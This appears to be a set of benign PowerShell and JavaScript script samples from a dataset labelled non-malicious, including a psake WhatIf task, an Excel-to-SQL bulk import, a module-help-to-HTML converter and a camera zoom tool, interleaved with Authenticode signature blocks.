XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjhEMDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBu # +gYs2LRha5pFO79g3LkfwKRnKKCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smZTzAiGA8yMDI0MTAyODA1MDIw # N1oYDzIwMjQxMDI5MDUwMjA3WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqyZlP # AgEAMAoCAQACAgMdAgH/MAcCAQACAhM2MAoCBQDqyurPAgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAKdpPIdnmDurw1W3KjddEyaQMnw+EyRSLq+zprTP8t/0 # ieGI79w2e6dpTuLIeBbTED1C/5vFaZhn3mit4LVJEIdMu9b2d8cWo3hrWDMqssZA # AGH3NNXRuQwPBIwzaTXVg8edpOImVomm0IlTA6TpSFjiSAij1Vxwohz3Men9w/M4 # fV0H5QtmVhWsq9bthffWvfyFz7mf6eSXX6VsSUsp/U8wwe3Z+xy/ccjeORHi3Um6 # IgANr2SLaO4c8JKNi9YyCO450ksm8NLZx2wEh8rG5dOylqGX8SZTVNxQg8uGM0FR # AEmTVQHT+Dvp3RsLMVX2f+49GvWR4VL26Voga63vAFkxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfPFCkOuA8wdMQABAAAB # 8zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCDKK+u5YAQpeq/twN/PY1KxKo+wzSBSRFOOXgb7hCgw # 0TCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIBi82TSLtuG4Vkp8wBmJk/T+ # RAh841sG/aDOwxg6O2LoMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHzxQpDrgPMHTEAAQAAAfMwIgQg9GCVSbXiruUvANYshaHmkS8a # AUtp4TeTu/csllVDepIwDQYJKoZIhvcNAQELBQAEggIAecSn5cCfS3CzsQzr1o+F # JW5HTBzuta+bJvHz4nhdS9ER0R6pq8h29e4LDKR2QkbN+UcjoIB9Xkjo+DpEwlTS # P7vEpSjsjZ4LsxDi3KTeIHHxpUcRnZ5YWK7kxxoI3xDi9/HGmnXdaEBkfBrZ0hau # Q/rfxpgJccB/B3BWWwCuQ7LLgiALadWhFTlcHJYXRFCF9MtcTk1AfyvdISHdVS/X # JnMW5Ob3rCZuAj+MfJ8iYQ96L9EaVsA8rvFHzrrnN8NTTStBcEsujQzFl64nRvSZ # F2VGf/lo46kNIDCG8HGVAFugIbzQb/JRelGuB1nWWy5Y5/t0MJA/5uQsE0LMSY1q # GYd0wMdaJ1elT8XGRkim4VU4cFy7xn2lz1KFM2fUHx1FDaDeH5pUlAq1hY4nLNDJ # 71Tuedyzmuu0IqFXqZgAE3lW5ruUjgjUeTa8WQL9y2xxUGAvX0f3gXDqC5smLQv1 # hB+Wo0SLhuD79Pe3zpQ3O5Bw2WLZqxcPxzdERH2yLlpsKJDA5MuNQoKlfH+zrfr7 # RvIMe2/CAmE3MVZ32rvwzj7W+pooLQ4rlVjLeaNW5ihEnBTCYoLlA1zjpvAYIvB3 # wEla09oFeYOap90/IWVmQYU3I66RxIGguvPxxYI58KhZomJtcuTkNXbHGa+O1nuZ # XJ8XFXwCs2dor/bSFLTMBT4= # SIG # End signature block
combined_dataset/train/non-malicious/2891.ps1
2891.ps1
Task default -Depends RunWhatIf Task RunWhatIf { try { $global:WhatIfPreference = $true $parameters = @{p1='whatifcheck';} Invoke-psake .\nested\whatifpreference.ps1 -parameters $parameters } finally { $global:WhatIfPreference = $false } }
combined_dataset/train/non-malicious/Import-ExcelToSQL_1.ps1
Import-ExcelToSQL_1.ps1
#Change these settings as needed $filepath = 'C:\\Users\\u00\\Documents\\backupset.xlsx' #Comment/Uncomment connection string based on version #Connection String for Excel 2007: $connString = "Provider=Microsoft.ACE.OLEDB.12.0;Data Source=`"$filepath`";Extended Properties=`"Excel 12.0 Xml;HDR=YES`";" #Connection String for Excel 2003: #$connString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=`"$filepath`";Extended Properties=`"Excel 8.0;HDR=Yes;IMEX=1`";" $qry = 'select * from [backupset$]' $sqlserver = 'Z002\\SQLEXPRESS' $dbname = 'SQLPSX' #Create a table in destination database with the with referenced columns and table name. $tblname = 'ExcelData_fill' ####################### function Get-ExcelData { param($connString, $qry='select * from [sheet1$]') $conn = new-object System.Data.OleDb.OleDbConnection($connString) $conn.open() $cmd = new-object System.Data.OleDb.OleDbCommand($qry,$conn) $da = new-object System.Data.OleDb.OleDbDataAdapter($cmd) $dt = new-object System.Data.dataTable [void]$da.fill($dt) $conn.close() $dt } #Get-ExcelData ####################### function Write-DataTableToDatabase { param($dt,$destServer,$destDb,$destTbl) $connectionString = "Data Source=$destServer;Integrated Security=true;Initial Catalog=$destdb;" $bulkCopy = new-object ("Data.SqlClient.SqlBulkCopy") $connectionString $bulkCopy.DestinationTableName = "$destTbl" $bulkCopy.WriteToServer($dt) }# Write-DataTableToDatabase ####################### $dt = Get-ExcelData $connString $qry Write-DataTableToDatabase $dt $sqlserver $dbname $tblname
combined_dataset/train/non-malicious/1468.ps1
1468.ps1
function Convert-ModuleHelpToHtml { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $ModuleName, [string[]] $Script, [hashtable] $HeadingMap, [Switch] $SkipCommandHelp ) Set-StrictMode -Version 'Latest' $commands = Get-Command -Module $ModuleName -CommandType Cmdlet,Function,Filter $moduleBase = Get-Module -Name $ModuleName | Select-Object -ExpandProperty 'ModuleBase' $aboutTopics = @() if( (Test-Path -Path (Join-Path -Path $moduleBase -ChildPath 'en-US') -PathType Container) ) { $aboutTopics = Get-ChildItem -Path $moduleBase -Filter 'en-US\about_*.help.txt' } $dscResources = Join-Path -Path $moduleBase -ChildPath 'DscResources' | Where-Object { Test-Path -Path $_ -PathType Container } | Get-ChildItem -Directory $scripts = @() if( $Script ) { $scripts = $Script | ForEach-Object { Join-Path -Path $moduleBase -ChildPath $_ } | Get-Item } [int]$numCommands = $commands | Measure-Object | Select-Object -ExpandProperty 'Count' [int]$numScripts = $scripts | Measure-Object | Select-Object -ExpandProperty 'Count' [int]$numAboutTopics = $aboutTopics | Measure-Object | Select-Object -ExpandProperty 'Count' [int]$numDscResources = $dscResources | Measure-Object | Select-Object -ExpandProperty 'Count' [int]$numPages = $numAboutTopics + $numDscResources + $numScripts if( -not $SkipCommandHelp ) { $numPages += $numCommands } $activity = 'Generating {0} Module HTML' -f $ModuleName $count = 0 foreach( $command in $commands ) { if( -not $SkipCommandHelp ) { Write-Progress -Activity $activity -PercentComplete ($count++ / $numPages * 100) -CurrentOperation $command.Name -Status 'Commands' $html = Convert-HelpToHtml -Name $command.Name -Script $Script -ModuleName $ModuleName [pscustomobject]@{ Name = $command.Name; Type = 'Command'; Html = $html; } } } foreach( $scriptItem in $scripts ) { Write-Progress -Activity $activity -PercentComplete ($count++ / $numPages * 100) -CurrentOperation $command.Name -Status 'Scripts' $html = Convert-HelpToHtml -Name $scriptItem.FullName -ModuleName $ModuleName -Script $Script [pscustomobject]@{ Name = $scriptItem.Name; Type = 'Script' Html = $html; } } foreach( $aboutTopic in $aboutTopics ) { $topicName = $aboutTopic.BaseName -replace '\.help','' Write-Progress -Activity $activity -PercentComplete ($count++ / $numPages * 100) -CurrentOperation $topicName -Status 'About Topics' $html = $aboutTopic | Convert-AboutTopicToHtml -ModuleName $ModuleName -Script $Script [pscustomobject]@{ Name = $topicName; Type = 'AboutTopic'; Html = $html } } foreach( $dscResource in $dscResources ) { $dscResourceName = $dscResource.BaseName Write-Progress -Activity $activity -PercentComplete ($count++ / $numPages * 100) -CurrentOperation $dscResourceName -Status 'DSC Resources' Import-Module -Name $dscResource.FullName $html = Convert-HelpToHtml -Name 'Set-TargetResource' -DisplayName $dscResourceName -Syntax (Get-DscResource -Name $dscResourceName -Syntax) -ModuleName $ModuleName -Script $Script [pscustomobject]@{ Name = $dscResourceName; Type = 'DscResource'; Html = $html; } } }
combined_dataset/train/non-malicious/sample_20_63.ps1
sample_20_63.ps1
var state = command.getTrait("state"); var manipData = services.manipulators.getManipulatorData("CameraManipulator"); var mode = null; if (manipData != null) { mode = manipData.getTrait("CameraManipulationMode"); } var tool = new Object(); tool.activate = function () { state.value = 2; if (mode != null) { mode.value = 3; // Zoom mode } } tool.deactivate = function () { state.value = 0; if (mode != null) { mode.value = 0; } } document.setTool(tool); // SIG // Begin signature block // SIG // MIInvQYJKoZIhvcNAQcCoIInrjCCJ6oCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // 6jLEGkl4tluxV0DcN/R7KShnoHiTTQ2hh1A6G4EOwyOg // SIG // gg12MIIF9DCCA9ygAwIBAgITMwAAA68wQA5Mo00FQQAA // SIG // AAADrzANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDkwMFoX // SIG // DTI0MTExNDE5MDkwMFowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // zkvLNa2un9GBrYNDoRGkGv7d0PqtTBB4ViYakFbjuWpm // SIG // F0KcvDAzzaCWJPhVgIXjz+S8cHEoHuWnp/n+UOljT3eh // SIG // A8Rs6Lb1aTYub3tB/e0txewv2sQ3yscjYdtTBtFvEm9L // SIG // 8Yv76K3Cxzi/Yvrdg+sr7w8y5RHn1Am0Ff8xggY1xpWC // SIG // XFI+kQM18njQDcUqSlwBnexYfqHBhzz6YXA/S0EziYBu // SIG // 2O2mM7R6gSyYkEOHgIGTVOGnOvvC5xBgC4KNcnQuQSRL // SIG // iUI2CmzU8vefR6ykruyzt1rNMPI8OqWHQtSDKXU5JNqb // SIG // k4GNjwzcwbSzOHrxuxWHq91l/vLdVDGDUwIDAQABo4IB // SIG // czCCAW8wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFEcccTTyBDxkjvJKs/m4AgEF // SIG // hl7BMEUGA1UdEQQ+MDykOjA4MR4wHAYDVQQLExVNaWNy // SIG // b3NvZnQgQ29ycG9yYXRpb24xFjAUBgNVBAUTDTIzMDAx // SIG // Mis1MDE4MjYwHwYDVR0jBBgwFoAUSG5k5VAF04KqFzc3 // SIG // IrVtqMp1ApUwVAYDVR0fBE0wSzBJoEegRYZDaHR0cDov // SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWlj // SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNybDBhBggr // SIG // BgEFBQcBAQRVMFMwUQYIKwYBBQUHMAKGRWh0dHA6Ly93 // SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj // SIG // Q29kU2lnUENBMjAxMV8yMDExLTA3LTA4LmNydDAMBgNV // SIG // HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4ICAQCEsRbf // SIG // 80dn60xTweOWHZoWaQdpzSaDqIvqpYHE5ZzuEMJWDdcP // SIG // 72MGw8v6BSaJQ+a+hTCXdERnIBDPKvU4ENjgu4EBJocH // SIG // lSe8riiZUAR+z+z4OUYqoFd3EqJyfjjOJBR2z94Dy4ss // SIG // 7LEkHUbj2NZiFqBoPYu2OGQvEk+1oaUsnNKZ7Nl7FHtV // SIG // 7CI2lHBru83e4IPe3glIi0XVZJT5qV6Gx/QhAFmpEVBj // SIG // SAmDdgII4UUwuI9yiX6jJFNOEek6MoeP06LMJtbqA3Bq // SIG // +ZWmJ033F97uVpyaiS4bj3vFI/ZBgDnMqNDtZjcA2vi4 // SIG // RRMweggd9vsHyTLpn6+nXoLy03vMeebq0C3k44pgUIEu // SIG // PQUlJIRTe6IrN3GcjaZ6zHGuQGWgu6SyO9r7qkrEpS2p // SIG // RjnGZjx2RmCamdAWnDdu+DmfNEPAddYjaJJ7PTnd+PGz // SIG // G+WeH4ocWgVnm5fJFhItjj70CJjgHqt57e1FiQcyWCwB // SIG // hKX2rGgN2UICHBF3Q/rsKOspjMw2OlGphTn2KmFl5J7c // SIG // Qxru54A9roClLnHGCiSUYos/iwFHI/dAVXEh0S0KKfTf // SIG // M6AC6/9bCbsD61QLcRzRIElvgCgaiMWFjOBL99pemoEl // SIG // AHsyzG6uX93fMfas09N9YzA0/rFAKAsNDOcFbQlEHKiD // SIG // T7mI20tVoCcmSIhJATCCB3owggVioAMCAQICCmEOkNIA // SIG // AAAAAAMwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290 // SIG // IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDExMB4XDTEx // SIG // MDcwODIwNTkwOVoXDTI2MDcwODIxMDkwOVowfjELMAkG // SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO // SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m // SIG // dCBDb3Jwb3JhdGlvbjEoMCYGA1UEAxMfTWljcm9zb2Z0 // SIG // IENvZGUgU2lnbmluZyBQQ0EgMjAxMTCCAiIwDQYJKoZI // SIG // hvcNAQEBBQADggIPADCCAgoCggIBAKvw+nIQHC6t2G6q // SIG // ghBNNLrytlghn0IbKmvpWlCquAY4GgRJun/DDB7dN2vG // SIG // EtgL8DjCmQawyDnVARQxQtOJDXlkh36UYCRsr55JnOlo // SIG // XtLfm1OyCizDr9mpK656Ca/XllnKYBoF6WZ26DJSJhIv // SIG // 56sIUM+zRLdd2MQuA3WraPPLbfM6XKEW9Ea64DhkrG5k // SIG // NXimoGMPLdNAk/jj3gcN1Vx5pUkp5w2+oBN3vpQ97/vj // SIG // K1oQH01WKKJ6cuASOrdJXtjt7UORg9l7snuGG9k+sYxd // SIG // 6IlPhBryoS9Z5JA7La4zWMW3Pv4y07MDPbGyr5I4ftKd // SIG // gCz1TlaRITUlwzluZH9TupwPrRkjhMv0ugOGjfdf8NBS // SIG // v4yUh7zAIXQlXxgotswnKDglmDlKNs98sZKuHCOnqWbs // SIG // YR9q4ShJnV+I4iVd0yFLPlLEtVc/JAPw0XpbL9Uj43Bd // SIG // D1FGd7P4AOG8rAKCX9vAFbO9G9RVS+c5oQ/pI0m8GLhE // SIG // fEXkwcNyeuBy5yTfv0aZxe/CHFfbg43sTUkwp6uO3+xb // SIG // n6/83bBm4sGXgXvt1u1L50kppxMopqd9Z4DmimJ4X7Iv // SIG // hNdXnFy/dygo8e1twyiPLI9AN0/B4YVEicQJTMXUpUMv // SIG // dJX3bvh4IFgsE11glZo+TzOE2rCIF96eTvSWsLxGoGyY // SIG // 0uDWiIwLAgMBAAGjggHtMIIB6TAQBgkrBgEEAYI3FQEE // SIG // AwIBADAdBgNVHQ4EFgQUSG5k5VAF04KqFzc3IrVtqMp1 // SIG // ApUwGQYJKwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYD // SIG // VR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0j // SIG // BBgwFoAUci06AjGQQ7kUBU7h6qfHMdEjiTQwWgYDVR0f // SIG // BFMwUTBPoE2gS4ZJaHR0cDovL2NybC5taWNyb3NvZnQu // SIG // Y29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0 // SIG // MjAxMV8yMDExXzAzXzIyLmNybDBeBggrBgEFBQcBAQRS // SIG // MFAwTgYIKwYBBQUHMAKGQmh0dHA6Ly93d3cubWljcm9z // SIG // b2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0MjAx // SIG // MV8yMDExXzAzXzIyLmNydDCBnwYDVR0gBIGXMIGUMIGR // SIG // BgkrBgEEAYI3LgMwgYMwPwYIKwYBBQUHAgEWM2h0dHA6 // SIG // Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvZG9jcy9w // SIG // cmltYXJ5Y3BzLmh0bTBABggrBgEFBQcCAjA0HjIgHQBM // SIG // AGUAZwBhAGwAXwBwAG8AbABpAGMAeQBfAHMAdABhAHQA // SIG // ZQBtAGUAbgB0AC4gHTANBgkqhkiG9w0BAQsFAAOCAgEA // SIG // Z/KGpZjgVHkaLtPYdGcimwuWEeFjkplCln3SeQyQwWVf // SIG // Liw++MNy0W2D/r4/6ArKO79HqaPzadtjvyI1pZddZYSQ // SIG // fYtGUFXYDJJ80hpLHPM8QotS0LD9a+M+By4pm+Y9G6XU // SIG // tR13lDni6WTJRD14eiPzE32mkHSDjfTLJgJGKsKKELuk // SIG // qQUMm+1o+mgulaAqPyprWEljHwlpblqYluSD9MCP80Yr // SIG // 3vw70L01724lruWvJ+3Q3fMOr5kol5hNDj0L8giJ1h/D // SIG // Mhji8MUtzluetEk5CsYKwsatruWy2dsViFFFWDgycSca // SIG // f7H0J/jeLDogaZiyWYlobm+nt3TDQAUGpgEqKD6CPxNN // SIG // ZgvAs0314Y9/HG8VfUWnduVAKmWjw11SYobDHWM2l4bf // SIG // 2vP48hahmifhzaWX0O5dY0HjWwechz4GdwbRBrF1HxS+ // SIG // YWG18NzGGwS+30HHDiju3mUv7Jf2oVyW2ADWoUa9WfOX // SIG // pQlLSBCZgB/QACnFsZulP0V3HjXG0qKin3p6IvpIlR+r // SIG // +0cjgPWe+L9rt0uX4ut1eBrs6jeZeRhL/9azI2h15q/6 // SIG // /IvrC4DqaTuv/DDtBEyO3991bWORPdGdVk5Pv4BXIqF4 // SIG // ETIheu9BCrE/+6jMpF3BoYibV3FWTkhFwELJm3ZbCoBI // SIG // a/15n8G9bW1qyVJzEw16UM0xghmfMIIZmwIBATCBlTB+ // SIG // MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv // SIG // bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj // SIG // cm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNy // SIG // b3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExAhMzAAAD // SIG // rzBADkyjTQVBAAAAAAOvMA0GCWCGSAFlAwQCAQUAoIGu // SIG // MBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG // SIG // AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3 // SIG // DQEJBDEiBCCTKNrah1zc0nZBAjfRNgTLg1l5nSjgGWwd // SIG // Vb72qXaLhDBCBgorBgEEAYI3AgEMMTQwMqAUgBIATQBp // SIG // AGMAcgBvAHMAbwBmAHShGoAYaHR0cDovL3d3dy5taWNy // SIG // b3NvZnQuY29tMA0GCSqGSIb3DQEBAQUABIIBAEu0e2R4 // SIG // IG43+CHTsvzkj7k49MEHayf1ehabmi3AZmFikQpAmQK9 // SIG // FtcrfbOdxoFcFkaneEvT031U7EUZ9kMi0PDev5a58tPo // SIG // IgDm/H4GlVVNcAD1ZG7Etw8Al6MXLKoUvMql3t4pEHdH // SIG // ZMMYp/C5EASmJ3pELZc0oqU4SJDEK9aapxaVrdxEudhr // SIG // cMm3t1TxgSGvDKgE2i6j955F4iyoj46JmZT5w4Dk3CbR // SIG // 3NYTyAaUvr4XKLSUtbn4GmXCYHcni5htvStP6KNhAHgm // SIG // d25EIHKU8LKz4TMzTnbFTq7Ig3Woay0tMH5UuDe8sOMI // SIG // XlQMvdfmk6dCpnh9qRm/K8E4J1ehghcpMIIXJQYKKwYB // SIG // BAGCNwMDATGCFxUwghcRBgkqhkiG9w0BBwKgghcCMIIW // SIG // /gIBAzEPMA0GCWCGSAFlAwQCAQUAMIIBWQYLKoZIhvcN // SIG // AQkQAQSgggFIBIIBRDCCAUACAQEGCisGAQQBhFkKAwEw // SIG // MTANBglghkgBZQMEAgEFAAQgoOKHN5DMXiFV9tPJ8f0V // SIG // RylA9jImHy07AnOAxYlV4S8CBmXWB5S2lhgTMjAyNDAy // SIG // MjkwNTUzMjUuNDgyWjAEgAIB9KCB2KSB1TCB0jELMAkG // SIG // A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO // SIG // BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m // SIG // dCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0 // SIG // IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYD // SIG // VQQLEx1UaGFsZXMgVFNTIEVTTjoxNzlFLTRCQjAtODI0 // SIG // NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg // SIG // U2VydmljZaCCEXgwggcnMIIFD6ADAgECAhMzAAAB4NT8 // SIG // HxMVH35dAAEAAAHgMA0GCSqGSIb3DQEBCwUAMHwxCzAJ // SIG // BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw // SIG // DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv // SIG // ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29m // SIG // dCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTIzMTAxMjE5 // SIG // MDcxOVoXDTI1MDExMDE5MDcxOVowgdIxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs // SIG // YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMd // SIG // VGhhbGVzIFRTUyBFU046MTc5RS00QkIwLTgyNDYxJTAj // SIG // BgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZp // SIG // Y2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC // SIG // AQCsh5zzocW70QE5xo2/+n7gYYd2S86LQMQIHS2mf85E // SIG // RVHXkis8jbd7aqKzCuxg73F3SrPqiDFG73p5R/sOd7LD // SIG // 2uq2D++tGbhawAa37Hq39JBWsjV1c8E+42qyThI5xTAa // SIG // fsovrsENk5ybsXM3HhuRQx6yCOrBehfO/ZT+snWNAQWZ // SIG // Gfbd/Xv7LzUYngOYFJ7/2HDP2yDGP0GJnfRdAfnmxWIv // SIG // jx+AJF2oTZBYCvOTiGkawxr4Z8Tmv+cxi+zooou/iff0 // SIG // B5HSRpX50X20N0FzP+f7pgTihuCaBWNZ4meUVR+T09Pr // SIG // go8HKoU2571LXyvjfsgdm/axGb6dk7+GcGMxHfQPVbGD // SIG // LmYgkm2hTJO+y8FW5JaZ8OGh1iVyZBGJib8UW3E4RPBU // SIG // MjqFZErinOTlmdvljP4+dKG5QNLQlOdwGrr1DmUaEAYf // SIG // PZxyvpuaTlyl3WDCfnHri2BfIecv3Fy0DDpqiyc+ZezC // SIG // 6hsFNMx1fjBDvC9RaNsxBEOIi+AV/GJJyl6JxxkGnEgm // SIG // i2aLdpMiVUbBUsZ9D5T7x1adGHbAjM3XosPYwGeyvbNV // SIG // sbGRhAayv6G4qV+rsYxKclAPZm1T5Y5W90eDFiNBNsSP // SIG // zTOheAHPAnmsd2Fi0/mlgmXqoiDC8cslmYPotSmPGRMz // SIG // HjUyghCOcBdcMaq+k9fzEKPvLQIDAQABo4IBSTCCAUUw // SIG // HQYDVR0OBBYEFHBeFz9unVfvErrKANV10Nkw0pnSMB8G // SIG // A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G // SIG // A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z // SIG // 